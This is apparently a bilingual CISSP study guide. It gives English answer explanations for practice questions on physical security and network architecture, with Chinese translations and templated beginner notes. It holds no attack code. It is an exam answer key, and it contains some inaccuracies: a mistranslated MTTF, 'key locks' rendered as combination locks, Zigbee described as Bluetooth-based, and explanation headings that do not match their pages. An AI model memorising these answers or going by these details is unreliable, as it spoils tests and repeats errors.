Detectors can be placed in drop ceilings to monitor that air space; this would only be a problem if another detector was not placed in the room's main area. If there are only detectors in the drop ceiling, then that could result in a false negative event. 11. D. The cause of the hardware failures is implied by the lack of organization of the equipment, which is heat buildup. This could be addressed by better managing temperature and airflow, which would involve implementing hot and cold aisles in the data center. A data center should have few, if any, actual visitors (such as outsiders), but anyone entering and leaving a data center should be tracked and recorded in a log.

However, whether or not a visitor log is present has little to do with system failure due to poor heat management. Industrial camouflage is not relevant here since it is about hiding the purpose of a facility from outside observers. A gas-based fire suppression system is more appropriate for a data center than a water-based system, but neither would cause heat problems due to poor system organization. 12. B, C, D. Benefits of gas-based fire suppression include causing the least damage to computer systems and extinguishing the fire quickly by removing oxygen. Also, gas-based fire suppression may be more effective and faster than a water-based system.

A gas-based fire suppression system can only be used where human presence is at a minimum, since it removes oxygen from the air. 13. B. The correct order of the six common physical security control mechanisms is Deter, Deny, Detect, Delay, Determine, Decide. The other options are incorrect. 14. C. Mean time to failure (MTTF) is the expected typical functional lifetime of the device given a specific operating environment. Mean time to repair (MTTR) is the average length of time required to perform a

中文直译 / 整理

仅有一个触发机制,无法防止意外放水。 10. B. 人为错误是水基系统误报最常见的原因。 如果你在火灾后关闭了水源却 忘记重新打开,将来就会遇到麻烦。 此外,在没有火灾的情况下拉动报警器, 会导致整个办公室发生破坏性的喷水。 缺水会成为一个问题,但它并不是导致 误报事件的原因。 电离探测器非常可靠,因此通常不是误报事件的原因。 探测 器可以安装在吊顶内以监测该空间; 只有当房间主要区域未安装其他探测器时, 这才可能成为一个问题。 如果仅在吊顶内安装探测器,则可能导致误报事件。 11. D. 硬件故障的原因隐含在设备缺乏组织性中,即热量积聚。 这可以通过更 好地管理温度和气流来解决,例如在数据中心实施冷热通道。 数据中心应几乎 没有实际访客(如外部人员),但任何进入和离开数据中心的人员都应被跟踪 并记录在日志中。 然而,是否有访客日志与因热量管理不善导致的系统故障关 系不大。 工业伪装与此无关,因为它涉及向外部观察者隐藏设施的目的。 气体 灭火系统比水基系统更适合数据中心,但两者都不会因系统组织不良而引起热 量问题。 12. B、C、D。 基于气体的灭火优势包括对计算机系统造成的损害最小,并通 过移除氧气迅速扑灭火灾。

此外,基于气体的灭火系统可能比基于水的系统更 有效且更快。 基于气体的灭火系统仅适用于人员稀少的区域,因为它会从空气 中移除氧气。 13. B。 六种常见的物理安全控制机制的正确顺序是威慑、拒绝、检测、延迟、 确定、决策。 其他选项均不正确。 14. C。 平均故障间隔时间(MTTF)是指在特定运行环境下,设备预期的典 型功能寿命。 平均修复时间(MTTR)是指执行一次

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1503 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 110 / PDF P1504

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

repair on the device. Mean time between failures (MTBF) is an estimation of the time between the first and any subsequent failures. A service-level agreement (SLA) clearly defines the response time a vendor will provide in the event of an equipment failure emergency. 15. C. Human safety is the most important goal of all security solutions. The top priority of security should always be the protection of the lives and safety of personnel. The protection of CIA (confidentiality, integrity, and availability) of company data and other assets is the second priority after human life and safety. 16. C.

A person trap is a double set of doors often protected by a guard and used to contain a subject until their identity and authentication is verified. A gate is a doorway used to traverse through a fence line. A turnstile is an ingress or egress point that allows travel only in one direction and by one person at a time. A proximity detector determines whether a proximity device is nearby and whether the bearer is authorized to access the area being protected. 17. D. Lighting is often claimed to be the most commonly deployed physical security mechanism. However, lighting is only a deterrent and not a strong deterrent.

It should not be used as the primary or sole protection mechanism except in areas with a low threat level. Your entire site, inside and out, should be well lit. This provides for easy identification of personnel and makes it easier to notice intrusions. Security guards are not as common as lighting, but they are more flexible in terms of security benefits. Fences are not as common as lighting, but they serve as a preventive control. CCTV is not as common as lighting but serves as a detection control. 18. A. Security guards are usually unaware of the scope of the operations within a facility and are therefore not thoroughly equipped to know how to respond to every situation.

Though this is considered a disadvantage, the lack of knowledge of the scope of the operations within a facility can also be considered an advantage because this supports confidentiality of those operations and thus helps reduce the possibility that a security guard will be involved in the disclosure of confidential information. Thus, even though this answer option is ambiguous, it is still better than the three other options. The other three options are disadvantages of security guards. Not all environments and facilities support security guards. This may be because of actual human incompatibility or the

中文直译 / 整理

设备维修。 平均故障间隔时间(MTBF)是首次故障与任何后续故障之间 时间的估算值。 服务级别协议(SLA)明确界定了在设备故障紧急情况下, 供应商将提供的响应时间。 15. C. 人身安全是所有安全解决方案的首要目标。 安全的首要任务始终是保护 人员的生命和安全。 保护公司数据和其他资产的机密性、完整性和可用性 (CIA)仅次于人身安全。 16. C. 人 trap 是一对双门,通常由保安守护,用于在验证身份和认证之前 暂时隔离人员。 门是用于穿越围栏的通道。 旋转门是一种仅允许单向、单 人通行的出入口。 邻近探测器用于判断是否有邻近设备存在,以及携带者 是否被授权访问受保护区域。 17. D. 照明常被认为是部署最广泛的安全物理措施。 然而,照明仅是一种威慑 手段,并非强有力的威慑。 除在低威胁区域外,不应将其作为主要或唯一保护 措施。 您的整个场地,包括室内外,都应充分照明。 这有助于轻松识别人员, 并更容易发现入侵行为。 保安人员不如照明普遍,但在安全效益方面更具灵活 性。 围栏不如照明普遍,但起到预防控制作用。 闭路电视(CCTV)不如照明 普遍,但起到检测控制作用。

18. A. 安保人员通常不了解设施内操作的范围,因此并不完全具备应对每种 情况的能力。 尽管这被视为一种劣势,但对设施内操作范围缺乏了解也可能 被视为一种优势,因为这有助于维护这些操作的机密性,从而降低安保人员 参与泄露机密信息的可能性。 因此,尽管这个选项存在歧义,它仍优于其他 三个选项。 其他三个选项都是安保人员的劣势。 并非所有环境和设施都支持 配备安保人员。 这可能是由于实际的人力不兼容或

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 111 / PDF P1505

第 1505 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

layout, design, location, and construction of the facility. Not all security guards are themselves reliable. Prescreening, bonding, and training do not guarantee that you won't end up with an ineffective or unreliable security guard. 19. C. Key locks are the most common and inexpensive form of physical access control device for both interior and exterior use. Lighting, security guards, and fences are all much more costly. Fences are also mostly used outdoors. 20. D. A capacitance motion detector senses changes in the electrical or magnetic field surrounding a monitored object.

A wave pattern motion detector transmits a consistent low ultrasonic or high microwave frequency signal into a monitored area and monitors for significant or meaningful changes or disturbances in the reflected pattern. A photoelectric motion detector senses changes in visible light levels for the monitored area. Photoelectric motion detectors are usually deployed in internal rooms that have no windows and are kept dark. An infrared PIR (passive infrared) or heat-based motion detector monitors for significant or meaningful changes in the heat levels and patterns in a monitored area.

中文直译 / 整理

设施的布局、设计、位置和建造。 并非所有保安人员都可靠。 预筛选、 担保和培训并不能保证您不会雇佣到无效或不可靠的保安人员。 19. C. 密码锁是最常见且最便宜的物理访问控制装置,适用于室内外。 照明、安全 保安和围栏的成本则高得多。 围栏主要用于户外。 20. D. 电容式运动探测器感知被监控物体周围电场或磁场的变化。 波形模式 运动探测器向被监控区域发射一致的低频超声波或高频微波信号,并监测反 射模式中的显著或有意义的变化或干扰。 光电式运动探测器感知被监控区域 可见光水平的变化。 光电式运动探测器通常部署在无窗户且保持黑暗的室内 房间。 红外被动红外(PIR)或基于热感的运动探测器监测被监控区域中热量 水平和模式的显著或有意义的变化。

小白解释

场景先行:你是公司的安全负责人,正在读第 1505 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1505 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 112 / PDF P1506

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Chapter 11: Secure Network Architecture and Components 1. A. The SYN flagged packet is first sent from the initiating host to the destination host; thus, it is the first step or phase in the TCP three-way handshake sequence used to establish a TCP session. The destination host then responds with a SYN/ACK flagged packet; this is the second step or phase of the TCP three-way handshake sequence. The initiating host sends an ACK flagged packet, and the connection is then established (the final or third step or phase). The FIN flag is used to gracefully shut down an established session. 2. D. UDP is a simplex protocol at the Transport Layer (Layer 4 of the OSI model).

Bits are associated with the Physical Layer (Layer 1). Logical addressing is associated with the Network Layer (Layer 3). Data reformatting is associated with the Presentation Layer (Layer 6). 3. A, B, D. The means by which IPv6 and IPv4 can coexist on the same network is to use one or more of three primary options: dual stack, tunneling, or NAT-PT. Dual stack is to have most systems operate both IPv4 and IPv6 and use the appropriate protocol for each conversation. Tunneling allows most systems to operate a single stack of either IPv4 or IPv6 and use an encapsulation tunnel to access systems of the other protocol.

Network Address Translation-Protocol Translation (NAT-PT) (RFC-2766) can be used to convert between IPv4 and IPv6 network segments similar to how NAT converts between internal and external addresses. IPSec is a standard of IP security extensions used as an add-on for IPv4 and integrated into IPv6, but it does not enable the use of both IPv4 and IPv6 on the same system (although it doesn't prevent it either). IP sideloading is not a real concept. 4. A, B, E. TLS allows for use of TCP port 443; prevents tampering, spoofing, and eavesdropping; and can be used as a VPN solution. The other options are incorrect. TLS supports both one-way and two-way authentication.

TLS and SSL are not interoperable or backward compatible. 5. B. Encapsulation is both a benefit and a potentially harmful implication of multilayer protocols. Encapsulation allows for encryption, flexibility, and resiliency, while also enabling covert channels, filter bypass, and overstepping network segmentation boundaries. Throughput is the capability of moving data across or through a network; this is not an

中文直译 / 整理

第11章:安全网络架构与组件 1. A. 首先,带有SYN标志的报文由发起主机发送至目标主机; 因此,它是用 于建立TCP会话的TCP三次握手序列的第一步或阶段。 目标主机随后响应一 个带有SYN/ACK标志的报文; 这是TCP三次握手序列的第二步或阶段。 发起 主机发送一个带有ACK标志的报文,连接随即建立(最后一步或第三阶段)。 FIN标志用于优雅地关闭已建立的会话。 2. D. UDP是传输层(OSI模型的第4层)的一种单工协议。 比特与物理层 (第1层)相关联。 逻辑寻址与网络层(第3层)相关联。 数据格式转换与 表示层(第6层)相关联。 3. A、B、D。 IPv6与IPv4在同一网络中共存的方式是使用以下三种主要选项 之一或多个:双栈、隧道或NAT‑PT。 双栈是指大多数系统同时运行IPv4和 IPv6,并为每次通信使用适当的协议。 隧道允许大多数系统仅运行IPv4或 IPv6中的单个协议栈,并通过封装隧道访问另一种协议的系统。 网络地址转 换‑协议转换(NAT‑PT)(RFC‑2766)可用于在IPv4和IPv6网络段之间进 行转换,类似于NAT在内部和外部地址之间的转换。

IPSec是IP安全扩展的 标准,作为IPv4的附加组件,并集成到IPv6中,但它并不允许在同一系统上 同时使用IPv4和IPv6(尽管它也不阻止这种使用)。 IP侧载不是一个真实存 在的概念。 4. A、B、E。 TLS 允许使用 TCP 端口 443; 可防止篡改、伪装和窃听; 并可 作为 VPN 解决方案使用。 其他选项均不正确。 TLS 支持单向和双向认证。 TLS 和 SSL 不兼容,也不向后兼容。 5. B。 封装既是多层协议的一个优势,也可能带来潜在危害。 封装允许加密、 灵活性和韧性,同时也可能启用隐蔽通道、绕过过滤器以及跨越网络分段边 界。 吞吐量是指在网络中传输数据的能力; 这不是一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 113 / PDF P1507

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

implication of multilayer protocols. Hash integrity checking is a common benefit of multilayer protocols because most layers include a hash function in their header or footer. Logical addressing is a benefit of multilayer protocols; this avoids the restriction of using only physical addressing. 6. C. In this scenario, the only viable option to provide performance, availability, and security for the VoIP service is to implement a new, separate network for the VoIP system that is independent of the existing data network. The current data network is already at capacity, so creating a new VLAN will not provide sufficient insurance that the VoIP service will be highly available.

Replacing switches with routers is usually not a valid strategy for increasing network capacity, and 1,000 Mbps is the same as 1 Gbps. Flood guards are useful against DoS and some transmission errors (such as Ethernet floods or broadcast storms), but they do not add more capacity to a network or provide reliable uptime for a VoIP service. 7. B, C, E. Micro-segmentation can be implemented using internal segmentation firewalls (ISFWs), transactions between zones are filtered, and it can be implemented with virtual systems and virtual networks. Affinity or preference is the assignment of the cores of a CPU to perform different tasks.

Micro-segmentation is not related to edge and fog computing management. 8. A. The device in this scenario would benefit from the use of Zigbee. Zigbee is an IoT equipment communications concept that is based on Bluetooth. Zigbee has low power consumption and a low throughput rate, and it requires close proximity of devices. Zigbee communications are encrypted using a 128-bit symmetric algorithm. Bluetooth is not a good option since it is usually plaintext. Bluetooth Low Energy (BLE) might be a viable option if custom encryption was added.

Geostationary orbit (GEO) satellite internet service would offer slower throughput with higher latency compared to terrestrial options, and while it may offer encryption, it is not an appropriate option for this scenario. 5G is the latest mobile service technology that is available for use on mobile phones, tablets, and other equipment. Though many IoT devices may support and use 5G, it is mostly used to provide direct access to the Internet rather than as a link to a local short-distance device, such as a PC or IoT hub.

中文直译 / 整理

多层协议的含义。 哈希完整性检查是多层协议的常见优势,因为大多数层 都在其头部或尾部包含哈希函数。 逻辑寻址是多层协议的优势; 这避免了 仅使用物理寻址的限制。 6. C。 在此场景中,为VoIP服务提供性能、可用性和安全性的唯一可行方案 是实施一个独立于现有数据网络的新专用网络。 当前数据网络已达到容量上 限,因此创建新的VLAN无法充分保证VoIP服务的高可用性。 用路由器替换 交换机通常不是增加网络容量的有效策略,且1,000 Mbps等同于1 Gbps。 洪水防护有助于防范DoS攻击和某些传输错误(如以太网洪水或广播风暴), 但它们无法增加网络容量,也无法为VoIP服务提供可靠的正常运行时间。 7. B、C、E。 微分段可通过内部分割防火墙(ISFW)实现,区域间的事务 会被过滤,并可通过虚拟系统和虚拟网络实现。 亲和性或偏好是指将CPU核 心分配执行不同任务。 微分段与边缘计算和雾计算管理无关。 8. A. 在此场景中,该设备将受益于使用Zigbee。 Zigbee是一种基于蓝牙的 物联网设备通信概念,具有低功耗和低吞吐率的特点,并要求设备之间近距 离通信。 Zigbee通信使用128位对称算法进行加密。

蓝牙不是良好选择,因 为它通常是明文传输。 如果添加自定义加密,蓝牙低功耗(BLE)可能是一 个可行的选项。 地球静止轨道(GEO)卫星互联网服务相比地面选项提供更 慢的吞吐率和更高的延迟,尽管它可能提供加密,但在此场景中并不适用。 5G是目前可用于手机、平板电脑及其他设备的最新移动服务技术。 虽然许多 物联网设备支持并使用5G,但它主要用于提供直接的互联网接入,而非作为 与本地短距离设备(如PC或物联网网关)连接的链路。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

同一密钥、速度快、大数据加密常对应 symmetric。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 114 / PDF P1508

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

9. A, B, D. Cellular services, such as 4G and 5G, raise numerous security and operational concerns. Although cellular service is encrypted from device to tower, there is a risk of being fooled by a false or rogue tower. A rogue tower could offer only plaintext connections, but even if it supported encrypted transactions, the encryption only applies to the radio transmissions between the device and the tower. Once the communication is on the tower, it will be decrypted, allowing for eavesdropping and content manipulation.

Even without a rogue tower, eavesdropping can occur across the cellular carrier's interior network as well as across the Internet, unless a VPN link is established between the remote mobile device and the network of the organization James works for. Being able to establish a connection can be unreliable depending on exactly where James's travel takes him. 4G and 5G coverage is not 100 percent available everywhere. Each 5G tower covers less area than a 4G tower. If James is able to establish a connection, 4G and 5G speeds should be sufficient for most remote technician activities, since 4G supports 100 Mbps for mobile devices, and 5G supports up to 10 Gbps.

If connectivity is established, there should be no issues with cloud interaction or duplex conversations. 10. B. A content distribution network (CDN), or content delivery network, is a collection of resource service hosts deployed in numerous data centers across the world to provide low latency, high performance, and high availability of the hosted content. VPNs are used to transport communications over an intermediary medium through the means of encapsulation (i.e., tunneling), authentication, and encryption. Softwaredefined networking (SDN) aims at separating the infrastructure layer from the control layer on networking hardware to reduce management complexity.

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) (Counter-Mode/CBC-MAC Protocol) is the combination of two block cipher modes to enable streaming by a block algorithm. 11. D. The true statement is: ARP poisoning can use unsolicited or gratuitous replies—specifically, ARP replies for which the local device did not transmit an ARP broadcast request. Many systems accept all ARP replies regardless of who requested them. The other statements are false. The correct versions of those statements would be: (A) MAC flooding is used to overload the memory of a switch, specifically the CAM table stored in switch memory when bogus information will cause the switch 9.

A、B、D。

中文直译 / 整理

蜂窝服务,例如4G和5G,会引发诸多安全和运营方面的担忧。 尽管蜂窝服务在设备与基站之间是加密的,但仍存在被虚假或 rogue 基站欺 骗的风险。 一个 rogue 基站可能仅提供明文连接,但即使它支持加密交易, 加密也仅适用于设备与基站之间的无线传输。 一旦通信到达基站,就会被解 密,从而允许窃听和内容篡改。 即使没有 rogue 基站,除非在詹姆斯的远程 移动设备与他所在组织的网络之间建立VPN连接,否则在整个蜂窝运营商的 内部网络以及互联网上都可能发生窃听。 根据詹姆斯旅行的具体地点,建立 连接可能不可靠。 4G和5G覆盖并非在所有地方都100%可用。 每个5G基站覆 盖的区域比4G基站更小。 如果詹姆斯能够建立连接,4G和5G的速度应足以 满足大多数远程技术人员的活动需求,因为4G支持移动设备最高100 Mbps,而5G最高支持10 Gbps。 如果建立了连接,与云的交互或双向对话 应无任何问题。 10. B. 内容分发网络(CDN)或内容交付网络,是由部署在全球众多数据中 心的资源服务主机组成的集合,旨在提供低延迟、高性能和高可用性的托管内 容。

VPN 通过封装(即隧道技术)、身份验证和加密,在中介介质上传输通 信。 软件定义网络(SDN)旨在将网络硬件中的基础设施层与控制层分离, 以降低管理复杂性。 计数器模式与密码分组链接消息认证码协议(CCMP) (计数器模式/CBC‑MAC 协议)是两种分组密码模式的结合,用于通过分组 算法实现流式传输。 11. D. 正确的陈述是:ARP 毒化可以使用非请求或免费的回复——即本地设备 并未发送 ARP 广播请求的 ARP 回复。 许多系统会接受所有 ARP 回复,无论 谁发起了请求。 其他陈述均为错误。 这些陈述的正确版本应为:(A) MAC 泛洪用于过载交换机的内存,特别是当伪造信息导致交换机内存中的 CAM 表溢出时

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 115 / PDF P1509

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

to function only in flooding mode. (B) MAC spoofing is used to falsify the physical address of a system to impersonate that of another authorized device. ARP poisoning associates an IP address with the wrong MAC address. (C) MAC spoofing relies on plaintext Ethernet headers to initially gather valid MAC addresses of legitimate network devices. ICMP crosses routers because it is carried as the payload of an IP packet. 12. D. The most likely cause of the inability to recover files from the SAN in this scenario is deduplication. Deduplication replaces multiple copies of a file with a pointer to one copy.

If the one remaining file is damaged, then all of the linked copies are damaged or inaccessible as well. File encryption could be an issue, but the scenario mentions that groups of people work on projects, and, typically, file encryption is employed by individuals, not by groups. Whole-drive encryption would be more appropriate for group-accessed files as well as for an SAN in general. This issue is not related to what SAN technology is used, such as Fibre Channel. This problem might be solvable by restoring files from a backup, whether real-time or not, but the loss of files is not caused by performing backups. 13. D.

In this scenario, the malware is performing a MAC flooding attack, which causes the switch to get stuck in flooding mode. This has taken advantage of the condition that the switch had weak configuration settings. The switch should have MAC limiting enabled to prevent MAC flooding attacks from being successful. Although Jim was initially fooled by a social engineering email, the question asked about the malware's activity. A MAC flooding attack is limited by network segmentation to the local switch, but the malware took advantage of weak or poor configuration on the switch and was still successful. MAC flooding is blocked by routers from crossing between switched network segments.

The malware did not use ARP queries in its attack. ARP queries can be abused in an ARP poisoning attack, but that was not described in this scenario. 14. B. A switch is an intelligent hub. It is considered to be intelligent because it knows the addresses of the systems connected on each outbound port. Repeaters are used to strengthen the communication signal over a cable segment as well as connect network segments that use the same protocol. A bridge is used to connect two networks together—even networks of different topologies, cabling types, and speeds—to connect network segments that use the same protocol. Routers are used to

中文直译 / 整理

